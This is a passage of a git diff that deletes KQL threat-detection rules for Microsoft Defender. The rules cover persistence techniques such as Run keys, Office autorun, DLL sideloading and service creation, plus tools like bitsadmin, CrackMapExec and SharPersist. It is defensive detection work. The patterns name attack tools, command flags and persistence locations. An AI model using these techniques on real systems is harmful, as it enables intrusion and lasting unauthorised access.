-| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/HackTool_-_CrackMapExec_Execution.kql b/Persistence/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Persistence/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Persistence/HackTool_-_SharPersist_Execution.kql b/Persistence/HackTool_-_SharPersist_Execution.kql
deleted file mode 100644
index 75962c94..00000000
--- a/Persistence/HackTool_-_SharPersist_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/15
-// Level: high
-// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
-// Tags: attack.persistence, attack.t1053
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist")
\ No newline at end of file
diff --git a/Persistence/IE_Change_Domain_Zone.kql b/Persistence/IE_Change_Domain_Zone.kql
deleted file mode 100644
index b4770567..00000000
--- a/Persistence/IE_Change_Domain_Zone.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Hides the file extension through modification of the registry
-// Tags: attack.persistence, attack.t1137
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)"))))
\ No newline at end of file
diff --git a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql b/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql
deleted file mode 100644
index 0213abe5..00000000
--- a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/12/11
-// Level: medium
-// Description: Detects suspicious IIS native-code module installations via command line
-// Tags: attack.persistence, attack.t1505.003
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe"))
\ No newline at end of file
diff --git a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql b/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql
deleted file mode 100644
index 5016e92a..00000000
--- a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked"))))
\ No newline at end of file
diff --git a/Persistence/Leviathan_Registry_Key_Activity.kql b/Persistence/Leviathan_Registry_Key_Activity.kql
deleted file mode 100644
index 2ebd1443..00000000
--- a/Persistence/Leviathan_Registry_Key_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aidan Bracher
-// Date: 2020/07/07
-// Level: critical
-// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd"
\ No newline at end of file
diff --git a/Persistence/MSExchange_Transport_Agent_Installation.kql b/Persistence/MSExchange_Transport_Agent_Installation.kql
deleted file mode 100644
index 734a09ec..00000000
--- a/Persistence/MSExchange_Transport_Agent_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/08
-// Level: medium
-// Description: Detects the Installation of a Exchange Transport Agent
-// Tags: attack.persistence, attack.t1505.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "Install-TransportAgent"
\ No newline at end of file
diff --git a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Persistence/Microsoft_Office_DLL_Sideload.kql b/Persistence/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Persistence/Microsoft_Office_DLL_Sideload.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql b/Persistence/Modify_User_Shell_Folders_Startup_Value.kql
deleted file mode 100644
index 7fba55a2..00000000
--- a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: high
-// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql b/Persistence/Narrator_s_Feedback-Hub_Persistence.kql
deleted file mode 100644
index 249e40b4..00000000
--- a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: high
-// Description: Detects abusing Windows 10 Narrator's Feedback-Hub
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)"
\ No newline at end of file
diff --git a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql b/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index 5b941e28..00000000
--- a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/06/25
-// Level: high
-// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
-// Tags: attack.persistence, attack.t1546.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE "
\ No newline at end of file
diff --git a/Persistence/New_Custom_Shim_Database_Created.kql b/Persistence/New_Custom_Shim_Database_Created.kql
deleted file mode 100644
index 5ffd2880..00000000
--- a/Persistence/New_Custom_Shim_Database_Created.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/29
-// Level: medium
-// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
-
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\"
\ No newline at end of file
diff --git a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql b/Persistence/New_Kernel_Driver_Via_SC.EXE.kql
deleted file mode 100644
index 1dbdb0cb..00000000
--- a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: medium
-// Description: Detects creation of a new service (kernel driver) with the type "kernel"
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql b/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql
deleted file mode 100644
index 30e9ae74..00000000
--- a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/11/28
-// Level: high
-// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-
-// Tags: attack.persistence, attack.t1546.007
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/Persistence/New_ODBC_Driver_Registered.kql b/Persistence/New_ODBC_Driver_Registered.kql
deleted file mode 100644
index 08b8669c..00000000
--- a/Persistence/New_ODBC_Driver_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/23
-// Level: low
-// Description: Detects the registration of a new ODBC driver.
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey contains "\\SQL Server"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver"))))
\ No newline at end of file
diff --git a/Persistence/New_Outlook_Macro_Created.kql b/Persistence/New_Outlook_Macro_Created.kql
deleted file mode 100644
index d9d853ed..00000000
--- a/Persistence/New_Outlook_Macro_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ScoubiMtl
-// Date: 2021/04/05
-// Level: medium
-// Description: Detects the creation of a macro file for Outlook.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM"
\ No newline at end of file
diff --git a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql b/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql
deleted file mode 100644
index d2608baa..00000000
--- a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
-// Date: 2018/08/25
-// Level: high
-// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (((RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Desktop\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "%temp%\\" or RegistryValueData contains "%tmp%\\") or (RegistryValueData startswith "%Public%\\" or RegistryValueData startswith "wscript" or RegistryValueData startswith "cscript")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce")) and (not(((RegistryValueData contains "rundll32.exe C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32" and RegistryValueData contains "C:\\Windows\\Temp\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\")))
\ No newline at end of file
diff --git a/Persistence/New_Service_Creation_Using_PowerShell.kql b/Persistence/New_Service_Creation_Using_PowerShell.kql
deleted file mode 100644
index ce9fb3fa..00000000
--- a/Persistence/New_Service_Creation_Using_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using powershell.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/Persistence/New_Service_Creation_Using_Sc.EXE.kql b/Persistence/New_Service_Creation_Using_Sc.EXE.kql
deleted file mode 100644
index dd56c1e4..00000000
--- a/Persistence/New_Service_Creation_Using_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using the "sc.exe" utility.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
deleted file mode 100644
index ef12160b..00000000
--- a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-Adversaries may abuse time providers to execute DLLs when the system boots.
-The Windows Time service (W32Time) enables time synchronization across and within domains.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL"))))
\ No newline at end of file
diff --git a/Persistence/New_User_Created_Via_Net.EXE.kql b/Persistence/New_User_Created_Via_Net.EXE.kql
deleted file mode 100644
index a83f4599..00000000
--- a/Persistence/New_User_Created_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community) -// Date: 2018/10/30 -// Level: medium -// Description: Identifies the creation of local users via the net.exe command. -// Tags: attack.persistence, attack.t1136.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql b/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql deleted file mode 100644 index 7e3622ff..00000000 --- a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/12 -// Level: high -// Description: Detects creation of local users via the net.exe command with the option "never expire" -// Tags: attack.persistence, attack.t1136.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Persistence/Office_Application_Startup_-_Office_Test.kql b/Persistence/Office_Application_Startup_-_Office_Test.kql deleted file mode 100644 index 83afa561..00000000 --- a/Persistence/Office_Application_Startup_-_Office_Test.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: omkar72 -// Date: 2020/10/25 -// Level: medium -// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started -// Tags: attack.persistence, attack.t1137.002 -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf" \ No newline at end of file diff --git a/Persistence/Office_Autorun_Keys_Modification.kql b/Persistence/Office_Autorun_Keys_Modification.kql deleted file mode 100644 index a9ff5181..00000000 --- a/Persistence/Office_Autorun_Keys_Modification.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office") and (RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey contains "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1" or RegistryKey contains "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect" or RegistryKey contains "\\Excel\\Addins\\NativeShim" or RegistryKey contains "\\Excel\\Addins\\NativeShim.InquireConnector.1" or RegistryKey contains "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1" or RegistryKey contains "\\Outlook\\AddIns\\AccessAddin.DC" or RegistryKey contains "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin" or RegistryKey contains "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector" or RegistryKey contains 
"\\Outlook\\AddIns\\EvernoteOLRD.Connect" or RegistryKey contains "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1" or RegistryKey contains "\\Outlook\\Addins\\OcOffice.OcForms" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey contains "\\Outlook\\Addins\\OscAddin.Connect" or RegistryKey contains "\\Outlook\\Addins\\OutlookChangeNotifier.Connect" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/Persistence/OilRig_APT_Registry_Persistence.kql b/Persistence/OilRig_APT_Registry_Persistence.kql deleted file mode 100644 index 83beccff..00000000 --- a/Persistence/OilRig_APT_Registry_Persistence.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2018/03/23 -// Level: critical -// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report -// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004 -DeviceRegistryEvents -| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT" \ No newline at end of file 
diff --git a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql b/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql deleted file mode 100644 index 2f3f3dd3..00000000 --- a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @ScoubiMtl -// Date: 2021/04/05 -// Level: high -// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros. -// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546 -DeviceRegistryEvents -| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level" \ No newline at end of file diff --git a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql b/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql deleted file mode 100644 index 88473077..00000000 --- a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/28 -// Level: medium -// Description: Detects changes to the registry values related to outlook security settings -// Tags: attack.persistence, attack.t1137 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Security" \ No newline at end of file diff --git a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql b/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql deleted file mode 100644 index 67f96f11..00000000 --- a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -DeviceFileEvents -| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/Persistence/Path_To_Screensaver_Binary_Modified.kql b/Persistence/Path_To_Screensaver_Binary_Modified.kql deleted file mode 100644 index 0e968bc4..00000000 --- 